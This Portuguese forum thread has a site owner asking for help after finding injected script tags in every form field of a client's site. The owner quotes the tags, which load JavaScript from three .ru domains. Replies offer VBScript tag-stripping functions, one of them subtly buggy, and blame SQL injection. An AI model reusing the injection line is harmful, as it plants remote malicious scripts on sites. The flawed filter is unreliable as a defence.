problema com meu site

[clayton-mer 0]

bom dia turma, um cliente me ligou hoje desendo o que o site dele estava com virus, então fui verificar. entrei na admin e em todos os campo text dos form tem o seguinte código.

 

<script src=http://media.postfolkovs.ru/js.js></script><script src=http://sslput.webservicebal.ru/js.js></script><script src=http://netmsg.webservicezok.ru/js.js></script>

o que fazer para resolver isso, e para isso não aocntecer mais. meu está hospedade na local web.

 

desde já muito obrigado

[saloeric 1]

Olá, basta impedir a inserção de dados quando aparecer <script></script>

 

pode usar esta função para remover o html, aqui remove o html todo

 

'remove htmls
Function RemoveHTMLTags(ByVal strHTML)
	Dim objER
	Dim strTexto
	'Configurando o objeto de Expressão Regular
	Set objER = New RegExp 
	objER.IgnoreCase = True
	objER.Global = True
	objER.Pattern = "<[^>]*>"
	'Substituindo as tags encontradas pela expressão
	strTexto = strHTML
	strTexto = objER.Replace(strTexto, "")
	Set objER = Nothing
	'Retornando a função
	RemoveHTMLTags = strTexto
End Function

ou esse remove apenas as tags k você definir

Function LimpaHTML(matriz)
Do While True
ini = InStr(1,matriz,"<script")
If ini = 0 Then Exit Do
fim = InStr(ini,matriz,"</script>")
parcial = Mid(matriz,ini,fim-ini+4)
matriz = Replace(matriz,parcial,"")
Loop
LimpaHTML = matriz
End Function

[paginad 0]

Olá. O seu site tem falha de programação, isso não depende da Locaweb. A técnica que foi usada para invadir o seu site chama-se SQL INJECTION, onde são injetados códigos na URL do seu site nas variaveis.

 

Se o seu site tem conteudo assim: www.site.com.br/noticias.asp?id=1, você precisa validar tudo que entra nessas variaveis antes de montar sua consultas ou inserts.

 

Procure sobre SQL INJECTION

 

Boa sorte!